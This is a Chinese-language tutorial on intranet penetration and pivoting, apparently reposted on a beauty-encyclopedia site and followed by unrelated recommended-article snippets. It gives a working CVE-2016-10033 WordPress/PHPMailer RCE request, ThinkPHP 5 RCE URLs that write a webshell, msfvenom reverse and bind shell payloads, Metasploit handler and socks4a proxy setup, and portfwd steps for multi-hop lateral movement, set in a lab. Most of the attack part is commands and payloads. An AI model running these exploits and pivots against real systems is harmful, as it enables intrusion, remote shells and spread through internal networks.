爱美容
当前位置: 首页 美容百科

内网穿透安全性(网络安全小百科--到底什么是内网穿透)

时间:2023-06-15 作者: 小编 阅读量: 2 栏目名: 美容百科

在平时护网比赛中,攻坚环境中,渗透测试中,做内网穿透使用的工具有很多如:EW、CobaltStrike为了方便小白入门,本次教程通过渗透过程中最常用的MSF攻击框架中socks4做内网穿透代理,实现内网横向渗透。也可以把WordPress用作一个内容管理系统来使用。WordPress使用PHPMailer组件向用户发送邮件。PHPMailer存在远程命令执行漏洞,攻击者只需轻松地构造出一个恶意邮箱地址,即可写入任意文件,从而造成远程命令执行的危害。

在平时护网比赛中,攻坚环境中,渗透测试中,做内网穿透使用的工具有很多如:EWCobalt Strike 为了方便小白入门,本次教程通过渗透过程中最常用的MSF攻击框架中socks4做内网穿透代理,实现内网横向渗透。

用本公司的靶场,模拟一个攻坚小场景:

外网IP:112.115.*.* (一台存在wordpress漏洞的web服务器)

内网:10.0.0.0/24 (模拟开发人员,一台为weblogic漏洞机器,一台为thinkphp漏洞机器)

渗透思路:用MSF对wordpress漏洞进行反弹shell,发现机器位于一个内网,建立socks4线路,横向扫描并对内网其他机器进行渗透并反弹shell

由于socks4做穿透超过3层就会失去流量速度,所以后期我会写一篇用EW或其他穿透工具做多网段多层穿透。

攻击机:kali

目标机:攻坚靶场

首先开启kali,利用Wordpress 4.6 任意命令执行漏洞,对主站服务器进行上传一句话或,直接反弹shell(为了一些教会小白一些提权细节,所以先写入一句话,然后在反弹msf shell)如果自己练习,可以直接msf生成shellcode扔到主站反弹shell。

0x001 主站渗透

打开主站http://122.115.*.*:8000/介绍一下这个漏洞

WordPress <= 4.6命令执行漏洞(PHPMailer)(CVE-2016-10033)WordPress是一种使用PHP语言开发的博客平台,用户可以在支持PHP和MySQL数据库的服务器上架设属于自己的网站。也可以把WordPress用作一个内容管理系统(CMS)来使用。WordPress使用PHPMailer组件向用户发送邮件。PHPMailer(版本<5.2.18)存在远程命令执行漏洞,攻击者只需轻松地构造出一个恶意邮箱地址,即可写入任意文件,从而造成远程命令执行的危害。

POC

假如目标地址为:http : //127.0.0.1 : 8000/

  1. 把下面的HTTP报文复制到BurpSuite Repeater中,单击Go按钮,填充目标IP和扩展(例如,IP填充127.0.0.1填充80)

POST /wp-login.php?action=lostpassword HTTP/1.1Host: target(any -froot@localhost -be ${run{${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}touch${substr{10}{1}{$tod_log}}${substr{0}{1}{$spool_directory}}var${substr{0}{1}{$spool_directory}}www${substr{0}{1}{$spool_directory}}html${substr{0}{1}{$spool_directory}}vuln}} null)Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:53.0) Gecko/20100101 Firefox/53.0Accept: */*Content-Length: 56Content-Type: application/x-www-form-urlencodedwp-submit=Get New Password&redirect_to=&user_login=admin

  1. 访问:http : //127.0.0.1 :8000/ vuln

看到返回状态码为200代表已经成功创建了/var/www/html/vuln文件

可在发包之前访问该地址,会出现404

注意:

  1. 远程URL中不要有 http://
  2. 所有字母必须小写
  3. 所有/用${substr{0}{1}{$spool_directory}}代替
  4. 空格所有用${substr{10}{1}{$tod_log}}代替

先利用poc对主站写入一个vuln空白页面,测试漏洞

然后写入一句话

用中国蚁剑连接webshell,下一步准备msf生成一个shell

在linux系统下/var/tmp目录可以进行高权限反弹shell,打开新的一个终端输入"msfconsole"启动msf

新打开一个终端生成反弹shell命令

msfvenom -p linux/x86/meterpreter/Reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf

回到msf端口msf>use exploit/multi/handler ###监听msf>set payload linux/x86/meterpreter/reverse_tcp ###反弹shell模块msf>run ###开始监听

用webshell把生成的shell.elf上传到/var/tmp/目录下,chmod x 提权(linux提权细节),在通过终端执行反弹shell

反弹shell成功,开始内网穿透

meterpreter > ipconfig ###查看网卡ip

0x002 搭建内网隧道横向渗透

meterpreter中添加好通向对方内网的路由

meterpreter > run autoroute -s 10.0.0.0/24meterpreter > route flush 不用的时候,记得删掉就行

由于目标是linux的,所以直接进行下一步如果是windows跳板机可以用以下命令进行扫描内网机器run post/windows/gather/arp_scanner RHOSTS=10.0.0.0/24 windows:可以先通过arp扫描粗略的扫一眼目标内网的机器大概有多少

msf>background 挂后台保持shell,开始下一步开启代理

msf exploit(handler) > use auxiliary/server/socks4a msf auxiliary(socks4a) > set 127.0.0.1msf auxiliary(socks4a) > set srvport 1080msf auxiliary(socks4a) > run

然后apt install proxychains,我kali已经安装了所以直接

vim /etc/proxychains.conf

添加 socks4 127.0.0.1 1080

这样msf本地开启socks4穿透,通过shell,转发到跳板机的机器

proxychains nmap -sT -sV -Pn -n -p80 10.0.0.0/24 ###通过跳板机扫描内网

发现 10.0.0.0/24段有个几台活跃ip,新建终端:proxychains firefox ####通过代理打开火狐浏览器

通过web跳板机访问到10.0.0.3,但是问题来了,目标内网有一台漏洞主机10.0.0.3,但是用菜刀或者蚂剑无法直接连接,所以有两个办法:

1.通过proxy代理启动蚁剑或者菜刀 2.目标机内网端口转发

使用portfwd模块(Metasploit中的一个post模块)可完成端口转发

meterpreter > portfwd -hUsage: portfwd [-h] [add | delete | list | flush] [args]OPTIONS: -L <opt> Forward: local host to listen on (optional). Remote: local host to connect to. -R Indicates a reverse port forward. -h Help banner. -i <opt> Index of the port forward entry to interact with (see the "list" command). -l <opt> Forward: local port to listen on. Reverse: local port to connect to. -p <opt> Forward: remote port to connect to. Reverse: remote port to listen on. -r <opt> Forward: remote host to connect to.

meterpreter > portfwd add -L 本地ip -l 本机端口 -p 目标内网端口 -r 目标内网

所以要建立一条线路用,msf 把本机某个端口直接转发到目标内网端口

攻击者本机<端口转发>>>>>跳板机>>>>>>目标机内网

现在无需任何代理,直接访问本机127.0.0.1:5000 就能访问到目标机内网

现在内网穿透拓扑结构就是

127.0.0.1:5000<>socks4:主站的shll<>内网10.0.0.3:80 本地端口 socks4 内网127.0.0.1:5000=10.0.0.3:80

0x003 多层跳板机穿透

现在对内网10.0.0.3进行渗透和提权,也就是127.0.0.1:5000

内网10.0.0.3是一台包含ThinkPHP5 5.0.22/5.1.29 远程代码执行漏洞的机器

直接访问http://your-ip/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1,即可执行phpinfo:

写入一句话shell就是

http://your-ip//index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=shell.php&vars[1][]=

蚁剑连接shell:127.0.0.1:5000/shell.php

现在要对这台内网机器提权msfshell,由于是内网隔离环境,所以需要使用bind_shell

在msf生成一个bind_shell开端口木马启动后,在做本段端口转发过去,msf在bind连接

新起一个终端:msf生成一个bindshell的木马(正向连接)

msfvenom -p linux/x86/meterpreter/bind_tcp lport=9999 -f elf -o bindshell

放到通过webshell 放到/var/tmp/下加权限,启动

现在内网10.0.0.3在9999端口开启直接连shell权限,现在要做一个新的转发把10.0.0.3:9999端口转发到本地,然后msf直连

sessions sessions id编号meterpreter > portfwd add -L 127.0.0.1 -l 9999 -p 10.0.0.3 -r 9999

现在内网10.0.0.3的bindshell 9999 端口 转发到 本地127.0.0.1:9999端口了

msf进行直连shell

use exploit/multi/handlerset payload linux/x86/meterpreter/bind_tcpshow optionsset LPORT 9999set RHOST 127.0.0.1run

等待连接shell

反弹shell后,只需要在10.0.0.3的shell上

use auxiliary/server/socks4aset 127.0.0.1set srvport 1081run添加一个新隧道

在/etc/proxychains.conf 中添加 socks4 127.0.0.1 1081

在proxychains nmap 扫描就是直接连接到10.0.0.3上进行转发扫描,内网二级穿透扫描

127.0.0.1:1080<>主站跳板跳板机<>10.0.0.3跳板机<>新ip(192.168.0.1)

实现了双跳板机内网穿透,同样方法,要是拿到192.168.0.1的第三层内网,只需要之前的添加个端口转发到本地,就能继续渗透。一般内网到第二层流量很少了,继续深层网段渗透就需要上 EW穿透神器等工具。

总结一下流程,拿到webshell,上传木马反弹的msf,msf做socks4的代理然后添加端口转发,进行下一层渗透,第二层同样继续反弹shell,做代理,端口转发。

    推荐阅读
  • 最简单的去头油方法(怎么去油头)

    最简单的去头油方法当遇到头油时,要有一个好的心态,积极治疗。最重要的是不能影响自己的情绪。给自己带来压力。每周洗发2-3次为宜。有规律的定期洗头,保持发丝及头皮的清洁。如果头发很油,需每天清洗,水中可适当放盐。用温和的洗发水,深层清洁头皮和头发,去除多余油脂。经常按摩,用手指腹轻轻按摩头皮,促进新陈代谢,这是保证发质健康不油腻的根源。味道会很快消失。不要喝酒吸烟,要适当运动下。

  • 网飞第一神作(网飞新片又赢麻了)

    有望第二次提名奥斯卡影帝。为此,他花费了数月参加声乐课。真实的情感已被取缔。27岁的剧作家已经在百老汇一炮而红。斩获了戏剧界最重磅的几项大奖,包括普利策戏剧奖、托尼奖。在全世界范围内,已经获得超过10亿美元的票房收入。1996年1月,他因主动脉瘤离世,年仅35岁。一生为音乐剧理想呕心沥血的乔恩,倒在了成名作公演的前夕。但令人欣慰的是,乔恩和他的作品持久地鼓舞着后世。饰演乔恩前两部音乐剧的女主角。

  • 已验机是什么意思(已验机的解释)

    下面内容希望能帮助到你,我们来一起看看吧!像现在很多买卖二手机平台都会有验机这个流程,显示已验机也就是这个机器已经被官方人员检测过了,这样顾客就可以放心购买。验机这个流程通常都是在二手市场才有的,已验机只能说是多了一层保护吧,也但也有不少用户反映验机后收货“翻车”的案例。对于价格比较高的数码产品,还是建议大家去实体店购买,有三包和售后的,更加安全可靠,二手交易平台隐患太多。

  • 宝马三系发动机过热能行驶多远停车 宝马3系发动机过热请小心停车

    宝马3系发动机过热无法继续行驶。正常情况下,当发动机过热时,汽车仪表上的温度警示灯会亮起。正确的行为是在怠速时停止,发动机不必停机。停在通风处,打开发动机盖,让发动机尽快散热。如果驾驶员不检查发现并加大对制冷剂的处理,很容易导致发动机过热。遇到发动机过热报警时,应先减速,然后将车转移到路边,不必紧急关闭发动机。

  • 家里养黑犬辟邪(黑狼犬可辟邪镇宅)

    其全身乌黑,短毛立耳朵,聚观赏性、实用性为一身。起源于中国北方地区,大型短毛犬,毛色全黑,竖耳。偶尔会对主人耍些小聪明,领地意识强,对老人和儿童天性友善,纯种的黑狼犬领地意识强,对待陌生人警惕,对主人十分忠诚,服从性高。般的鬼物碰到黑狗血都会大减威力关于这种说法,我也是半信半疑,不知道你们怎么看,说出你们的想法,请在评论区留言

  • 520情话最暖心短句说说(关于520情话最暖心短句说说)

    520情话最暖心短句说说?今生有你相伴,是我一生的幸福。夏日湾,月亮的港湾,星星的河流,你垂钓思念在我心头;夏日湾,幸福的港湾,快乐的河流,我垂钓浪漫在你笑容街头,愿者上钩哦。我的爱,每一个诗人都爱美,你的美更令诗人神飞心醉。但是美是变动的呀,我爱你永远无涯岸。亲爱的,愿你因我而幸福。累了就停下来,我的肩膀在等待;委屈了就让泪水落下来,我的胸膛在守候。宝贝,玫瑰情人节,除了玫瑰,还想送你一生一世的爱。

  • 红岸基地是否存在(我去红岸基地原型地逛了逛)

    我去红岸基地原型地逛了逛​(原文题为《时间之外的往事:三体红岸基地原型“7010”远程预警雷达遗址行记》)2019年是叶文洁向三体世界发射“到这里来吧,我将帮助你们获得这个世界”信号四十周年作为科幻迷,纪念这一壮举(亦或轻率。

  • 哺乳动物成熟红细胞特点是什么(细胞中有核吗)

    哺乳动物成熟的红细胞是最简单的真核细胞在细胞中无细胞核,因为已经退化消失了红细胞是红色的,因为含有血红蛋白故完全可以说,成熟的红细胞的结构特点是:无细胞核,无细胞器,当然和植物细胞相比较还没有细胞壁,现在小编就来说说关于哺乳动物成熟红细胞特点是什么?下面内容希望能帮助到你,我们来一起看看吧!红细胞是红色的,因为含有血红蛋白。

  • 奥睿科固态硬盘盒(闲置的笔记本硬盘又活力四射)

    包装内容也是一些基本的配件,硬盘盒、USB3.0数据线、说明书等等这是一款透明的2.5英寸硬盘盒,盖子与主体采用的是透明PC材质,底部是一块铝合金散热片固定在透明的盒子内。奥睿科2.5英寸硬盘盒的USB3.0数据线的长度适中,不管是笔记本还是台式机都能够使用。奥睿科2.5英寸硬盘盒,优点是小巧,透明的设计很通透,颜值高,且自带散热片加分不少,不用担心使用中散热问题了。相对于优盘,缺点是线与盒子必不可少,平时随身带线是必不可少的。

  • 鼓励人心的正能量文案(励志正能量句子)

    鼓励人心的正能量文案梦想注定是孤独的旅程,路上少不了质疑和嘲笑,但那又怎样,哪怕遍体鳞伤也要勇往直前。不要怪罪世界现实,让自己强大才是给自己最好的安全感。所有美好,都不负归期,选一种姿态让自己活得无可替代,没有所谓的运气只有绝对的努力。人生的某些障碍,你是逃不掉的。与其费尽周折绕过去,不如勇敢地攀越,或许这会铸就你人生的高点。这世界不会辜负每一份努力和坚持。时光不会怠慢执着而勇敢的每一个人。